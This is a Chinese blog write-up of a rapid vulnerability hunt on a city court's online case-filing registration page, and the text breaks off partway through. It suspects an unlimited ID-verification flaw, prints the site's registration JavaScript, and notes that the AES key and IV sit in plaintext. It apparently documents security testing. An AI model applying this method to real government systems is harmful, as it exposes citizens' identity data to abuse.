

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta name="baidu-site-verification" content="codeva-Ur4fN4rGxO" />

  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Thanatos">
  <meta name="keywords" content="">
  
    <meta name="description" content="开始测试首先访问给出的URL可以看到有很多功能点，随便点几个发现都需要先登录才可以使用   这里我们为了速度就直接测试注册功能点，不再测试忘记密码和后续的功能点了 填入信息之后点击注册提示身份验证失败，推测此处会有无限制二要素验证漏洞无限二要素验证应该能给个中低危，毕竟这种漏洞基本都是黑灰产才有利用点 抓包现在使用BurpSuite看看数据包有没有加密坏消息，数据包被加密了，只能试着扒js了 分析">
<meta property="og:type" content="article">
<meta property="og:title" content="记一次某超一线城市中级人民法院的极速漏洞挖掘">
<meta property="og:url" content="http://blog.luckysix.cc/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/index.html">
<meta property="og:site_name" content="星宇博客">
<meta property="og:description" content="开始测试首先访问给出的URL可以看到有很多功能点，随便点几个发现都需要先登录才可以使用   这里我们为了速度就直接测试注册功能点，不再测试忘记密码和后续的功能点了 填入信息之后点击注册提示身份验证失败，推测此处会有无限制二要素验证漏洞无限二要素验证应该能给个中低危，毕竟这种漏洞基本都是黑灰产才有利用点 抓包现在使用BurpSuite看看数据包有没有加密坏消息，数据包被加密了，只能试着扒js了 分析">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://blog.luckysix.cc/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.png">
<meta property="og:image" content="http://blog.luckysix.cc/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/2.png">
<meta property="og:image" content="http://blog.luckysix.cc/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/3.png">
<meta property="og:image" content="http://blog.luckysix.cc/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/4.png">
<meta property="article:published_time" content="2024-09-20T19:46:43.000Z">
<meta property="article:modified_time" content="2024-12-11T11:24:54.427Z">
<meta property="article:author" content="Thanatos">
<meta property="article:tag" content="Python">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="JavaScript">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://blog.luckysix.cc/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.png">
  
  
  
  <title>记一次某超一线城市中级人民法院的极速漏洞挖掘 - 星宇博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"blog.luckysix.cc","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":"JrLHvwrf0l2iZ6tT","cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>星宇博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="记一次某超一线城市中级人民法院的极速漏洞挖掘"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-09-21 03:46" pubdate>
          2024年9月21日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          12 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">记一次某超一线城市中级人民法院的极速漏洞挖掘</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="开始测试"><a href="#开始测试" class="headerlink" title="开始测试"></a>开始测试</h1><p>首先访问给出的URL<br><img src="/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.png" srcset="/img/loading.gif" lazyload alt="1"><br>可以看到有很多功能点，随便点几个发现都需要先登录才可以使用<br><img src="/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/2.png" srcset="/img/loading.gif" lazyload alt="2">  </p>
<p>这里我们为了速度就直接测试<code>注册</code>功能点，不再测试<code>忘记密码</code>和后续的功能点了</p>
<p>填入信息之后点击注册提示<code>身份验证失败</code>，推测此处会有无限制二要素验证漏洞<br><img src="/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/3.png" srcset="/img/loading.gif" lazyload alt="3"><br>无限二要素验证应该能给个中低危，毕竟这种漏洞基本都是黑灰产才有利用点</p>
<h2 id="抓包"><a href="#抓包" class="headerlink" title="抓包"></a>抓包</h2><p>现在使用BurpSuite看看数据包有没有加密<br><img src="/2024/09/21/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9F%90%E8%B6%85%E4%B8%80%E7%BA%BF%E5%9F%8E%E5%B8%82%E4%B8%AD%E7%BA%A7%E4%BA%BA%E6%B0%91%E6%B3%95%E9%99%A2%E7%9A%84%E6%9E%81%E9%80%9F%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/4.png" srcset="/img/loading.gif" lazyload alt="4"><br>坏消息，数据包被加密了，只能试着扒js了</p>
<h2 id="分析JS"><a href="#分析JS" class="headerlink" title="分析JS"></a>分析JS</h2><p>数据包一眼base64，但是解密后还是被加密过的，猜测是aes<br>网站js倒是挺好找，代码也不长只有一百多行，也没有混淆<br>贴一下源码吧  </p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br></pre></td><td class="code"><pre><code class="hljs JavaScript">  $(<span class="hljs-keyword">function</span> (<span class="hljs-params"></span>) &#123;<br>  	<span class="hljs-comment">/*初始化验证码*/</span><br>  	<span class="hljs-title function_">createCode</span>();<br>  	$(<span class="hljs-string">&quot;#register&quot;</span>).<span class="hljs-title function_">click</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)&#123;<br>  		<span class="hljs-keyword">if</span>(!<span class="hljs-title function_">checkForm</span>())&#123;<br>  			<span class="hljs-keyword">return</span>;<br>  		&#125;<br>  		<span class="hljs-keyword">var</span> zjhm = <span class="hljs-title function_">aesMinEncrypt</span>($(<span class="hljs-string">&quot;#zjhm&quot;</span>).<span class="hljs-title function_">val</span>());<br>  		<span class="hljs-keyword">var</span> name = <span class="hljs-title function_">aesMinEncrypt</span>($(<span class="hljs-string">&quot;#name&quot;</span>).<span class="hljs-title function_">val</span>());<br>  		<span class="hljs-keyword">var</span> dzyx = <span class="hljs-title function_">aesMinEncrypt</span>($(<span class="hljs-string">&quot;#dzyx&quot;</span>).<span class="hljs-title function_">val</span>());<br>  		<span class="hljs-keyword">var</span> mm = <span class="hljs-title function_">aesMinEncrypt</span>($(<span class="hljs-string">&quot;#mm&quot;</span>).<span class="hljs-title function_">val</span>());<br>  		<span class="hljs-keyword">var</span> sjhm = <span class="hljs-title function_">aesMinEncrypt</span>($(<span class="hljs-string">&quot;#sjhm&quot;</span>).<span class="hljs-title function_">val</span>());<br><br>  		<span class="hljs-keyword">var</span> params = &#123;<span class="hljs-string">&#x27;yzm&#x27;</span>:$(<span class="hljs-string">&quot;#J_codetext&quot;</span>).<span class="hljs-title function_">val</span>(), <span class="hljs-string">&#x27;dsrlx&#x27;</span>:<span class="hljs-string">&quot;1&quot;</span>, <span class="hljs-string">&#x27;zjlx&#x27;</span>:<span class="hljs-string">&quot;1&quot;</span>, <span class="hljs-string">&#x27;zjhm&#x27;</span>: zjhm, <span class="hljs-string">&#x27;name&#x27;</span>: name, <span class="hljs-string">&#x27;dzyx&#x27;</span>: dzyx, <span class="hljs-string">&#x27;mm&#x27;</span>: mm, <span class="hljs-string">&#x27;sjhm&#x27;</span>: sjhm&#125;;<br>  		$.<span class="hljs-title function_">ajax</span>(&#123;<br>  			<span class="hljs-attr">url</span>:<span class="hljs-string">&quot;/user/create&quot;</span>, <br>  			<span class="hljs-attr">data</span>:params,<br>  			type : <span class="hljs-string">&#x27;post&#x27;</span>,<br>  			cache : <span class="hljs-literal">false</span>,<br>  			dataType : <span class="hljs-string">&#x27;json&#x27;</span>,<br>  			success : <span class="hljs-keyword">function</span>(<span class="hljs-params">data</span>) &#123;<br>  				<span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(data);<br>  				<span class="hljs-keyword">if</span>(data.<span class="hljs-property">success</span>)&#123;<br>  					<span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(data);<br>  					layer.<span class="hljs-title function_">open</span>(&#123;<br>  						content : <span class="hljs-string">&quot;注册成功&quot;</span>,<br>  						time : <span class="hljs-number">1</span>,<br>  					&#125;);<br>  					<span class="hljs-title function_">autoLogin</span>($(<span class="hljs-string">&quot;#zjhm&quot;</span>).<span class="hljs-title function_">val</span>(),$(<span class="hljs-string">&quot;#mm&quot;</span>).<span class="hljs-title function_">val</span>());<br>  				&#125;<span class="hljs-keyword">else</span>&#123;<br>  					layer.<span class="hljs-title function_">open</span>(&#123;<br>  						content : data.<span class="hljs-property">msg</span>,<br>  						time : <span class="hljs-number">1</span>,<br>  					&#125;);<br>  					<span class="hljs-title function_">createCode</span>();<br>  				&#125;<br>  			&#125;<br>  		&#125;);<br>  	&#125;);<br>  	<br><span class="hljs-comment">/*验证页面*/</span><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">checkForm</span>(<span class="hljs-params"></span>)&#123;<br>	<span class="hljs-keyword">var</span> name = $(<span class="hljs-string">&quot;#name&quot;</span>).<span class="hljs-title function_">val</span>();<br>	<span class="hljs-keyword">if</span>(name == <span class="hljs-literal">null</span> || name == <span class="hljs-string">&quot;&quot;</span>)&#123;<br>		layer.<span class="hljs-title function_">open</span>(&#123;<br>			content : <span class="hljs-string">&quot;请输入姓名&quot;</span>,<br>			time : <span class="hljs-number">1</span>,<br>		&#125;);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>	&#125;<br>	<br>	<span class="hljs-keyword">var</span> zjhm = $(<span class="hljs-string">&quot;#zjhm&quot;</span>).<span class="hljs-title function_">val</span>();<br>	<span class="hljs-keyword">if</span>(zjhm == <span class="hljs-literal">null</span> || zjhm == <span class="hljs-string">&quot;&quot;</span>)&#123;<br>		layer.<span class="hljs-title function_">open</span>(&#123;<br>			content : <span class="hljs-string">&quot;请输入证件号码&quot;</span>,<br>			time : <span class="hljs-number">1</span>,<br>		&#125;);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>	&#125;<br>	<span class="hljs-keyword">var</span> sjhm = $(<span class="hljs-string">&quot;#sjhm&quot;</span>).<span class="hljs-title function_">val</span>();<br>	<span class="hljs-keyword">if</span>(sjhm == <span class="hljs-literal">null</span> || sjhm == <span class="hljs-string">&quot;&quot;</span>)&#123;<br>		layer.<span class="hljs-title function_">open</span>(&#123;<br>			content : <span class="hljs-string">&quot;请输入手机号码&quot;</span>,<br>			time : <span class="hljs-number">1</span>,<br>		&#125;);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>	&#125;<br>	<span class="hljs-keyword">var</span> mm = $(<span class="hljs-string">&quot;#mm&quot;</span>).<span class="hljs-title function_">val</span>();<br>	<span class="hljs-keyword">if</span>(mm == <span class="hljs-literal">null</span> || mm == <span class="hljs-string">&quot;&quot;</span>)&#123;<br>		layer.<span class="hljs-title function_">open</span>(&#123;<br>			content : <span class="hljs-string">&quot;请输入密码&quot;</span>,<br>			time : <span class="hljs-number">1</span>,<br>		&#125;);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>	&#125;<br>	<span class="hljs-keyword">var</span> qrmm = $(<span class="hljs-string">&quot;#qrmm&quot;</span>).<span class="hljs-title function_">val</span>();<br>	<span class="hljs-keyword">if</span>(qrmm == <span class="hljs-literal">null</span> || qrmm == <span class="hljs-string">&quot;&quot;</span>)&#123;<br>		layer.<span class="hljs-title function_">open</span>(&#123;<br>			content : <span class="hljs-string">&quot;请输入确认密码&quot;</span>,<br>			time : <span class="hljs-number">1</span>,<br>		&#125;);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>	&#125;<br>	<span class="hljs-keyword">if</span> (mm != qrmm) &#123;<br>		layer.<span class="hljs-title function_">open</span>(&#123;<br>			content : <span class="hljs-string">&quot;密码与确认密码不一致&quot;</span>,<br>			time : <span class="hljs-number">1</span>,<br>		&#125;);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>	&#125;<br>	<span class="hljs-keyword">if</span>(!<span class="hljs-title function_">validate</span>())&#123;<br>		layer.<span class="hljs-title function_">open</span>(&#123;<br>			content : <span class="hljs-string">&quot;验证码输入错误&quot;</span>,<br>			time : <span class="hljs-number">1</span>,<br>		&#125;);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>	&#125;<br>	<span class="hljs-keyword">if</span> (!$(<span class="hljs-string">&quot;#ydxy&quot;</span>).<span class="hljs-title function_">is</span>(<span class="hljs-string">&#x27;:checked&#x27;</span>)) &#123;<br>		layer.<span class="hljs-title function_">open</span>(&#123;<br>			content : <span class="hljs-string">&quot;请同意《微信预约立案协议》&quot;</span>,<br>			time : <span class="hljs-number">1</span>,<br>		&#125;);<br>		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>	&#125;<br>	<span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>&#125;<br>  &#125;);<br>  <span class="hljs-keyword">function</span> <span class="hljs-title function_">autoLogin</span>(<span class="hljs-params">idcard, password</span>) &#123;<br>  	$.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/user/doLogin&#x27;</span>, &#123;<br>  		idcard : idcard,<br>  		password : password,<br>  	&#125;, <span class="hljs-keyword">function</span>(<span class="hljs-params">data</span>) &#123;<br>  		<span class="hljs-keyword">if</span> (data.<span class="hljs-property">success</span>) &#123;<br>  			<span class="hljs-keyword">var</span> to = <span class="hljs-title function_">getValue</span>(<span class="hljs-string">&#x27;to&#x27;</span>);<br>  			<span class="hljs-keyword">if</span> (to != <span class="hljs-literal">null</span> &amp;&amp; to != <span class="hljs-string">&#x27;&#x27;</span>) &#123;<br>  				<span class="hljs-keyword">if</span> (to == <span class="hljs-string">&#x27;bz&#x27;</span>)<br>  					<span class="hljs-comment">//url = &#x27;reapply.html&#x27;;</span><br>  					url = <span class="hljs-string">&#x27;../prereapply.html&#x27;</span>;<br>  				<span class="hljs-keyword">if</span> (to == <span class="hljs-string">&#x27;ycbz&#x27;</span>)<br>  					url = <span class="hljs-string">&#x27;../personalIndex.html&#x27;</span>;<br>  				<span class="hljs-keyword">if</span> (to == <span class="hljs-string">&#x27;yyla&#x27;</span>)<br>  					url = <span class="hljs-string">&#x27;../personalPor.html&#x27;</span>;<br>  				<span class="hljs-keyword">if</span>(to==<span class="hljs-string">&#x27;set&#x27;</span>)<br>  					url = <span class="hljs-string">&#x27;../personalSeting.html&#x27;</span>;<br>  				<span class="hljs-keyword">if</span>(to==<span class="hljs-string">&quot;yy&quot;</span>)<br>  					url = <span class="hljs-string">&#x27;../order.html&#x27;</span>;<br>  				<span class="hljs-keyword">if</span>(to==<span class="hljs-string">&quot;rz&quot;</span>)<br>  					url = <span class="hljs-string">&#x27;../authe/inputCode.html&#x27;</span>;<br>  				<span class="hljs-keyword">if</span>(to==<span class="hljs-string">&quot;grzxsfyz&quot;</span>)<br>  					url = <span class="hljs-string">&#x27;../authe/personalAuthe.html&#x27;</span>;<br>  				<span class="hljs-keyword">if</span>(to==<span class="hljs-string">&quot;wdaj&quot;</span>)<br>  					url = <span class="hljs-string">&#x27;../wdaj/ajlb.html&#x27;</span>;<br>  			&#125;<br>  			<span class="hljs-variable language_">window</span>.<span class="hljs-built_in">setTimeout</span>(redrect, <span class="hljs-number">1000</span>);<br>  		&#125;<br>  	&#125;);<br>  &#125;<br><span class="hljs-comment">//验证码校验</span><br>  <span class="hljs-keyword">function</span> <span class="hljs-title function_">validate</span>(<span class="hljs-params"></span>) &#123;<br>  	<span class="hljs-keyword">var</span> inputCode = <span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&quot;J_codetext&quot;</span>).<span class="hljs-property">value</span>.<span class="hljs-title function_">toUpperCase</span>();<br>  	<span class="hljs-keyword">var</span> codeToUp = code.<span class="hljs-title function_">toUpperCase</span>();<br>  	<span class="hljs-keyword">if</span> (inputCode.<span class="hljs-property">length</span> &lt;= <span class="hljs-number">0</span>) &#123;<br>  		<span class="hljs-title function_">createCode</span>();<br>  		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>  	&#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (inputCode != codeToUp) &#123;<br>  		<span class="hljs-variable language_">document</span>.<span class="hljs-title function_">getElementById</span>(<span class="hljs-string">&quot;J_codetext&quot;</span>).<span class="hljs-property">value</span> = <span class="hljs-string">&quot;&quot;</span>;<br>  		<span class="hljs-title function_">createCode</span>();<br>  		<span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>  	&#125; <span class="hljs-keyword">else</span> &#123;<br>  		<span class="hljs-title function_">createCode</span>();<br>  		<span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>  	&#125;<br>  &#125;<br></code></pre></td></tr></table></figure>

<p>由于这次是快速挖洞所以就不具体分析了，这个js大概功能就是</p>
<ul>
<li>使用<code>createCode()</code>方法初始化验证码，<code>validate()</code>方法校验用户输入的验证码是否正确</li>
<li>点击 注册 按钮时，通过<code>checkForm()</code>验证表单数据的完整性和正确性</li>
<li>表单数据通过<code>aesMinEncrypt</code>加密后，以 POST 请求方式提交到服务器<code>/user/create</code></li>
<li>根据服务器返回的数据，显示注册成功或失败的信息。如果失败，重新生成验证码</li>
<li>注册成功后调用<code>autoLogin()</code>自动登录，并根据返回值跳转到不同页面</li>
</ul>
<p>现在开始分析加密逻辑<br>又是个好消息，加密函数单独拆分成了一个js，并且 密钥 和 iv 都是明文  </p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs JavaScript">............<br><span class="hljs-keyword">function</span> <span class="hljs-title function_">aesMinEncrypt</span>(<span class="hljs-params">word</span>)&#123;<br>    <span class="hljs-keyword">var</span> _word = <span class="hljs-title class_">CryptoJS</span>.<span class="hljs-property">enc</span>.<span class="hljs-property">Utf8</span>.<span class="hljs-title function_">parse</span>(word),<br>        _key = <span class="hljs-title class_">CryptoJS</span>.<span 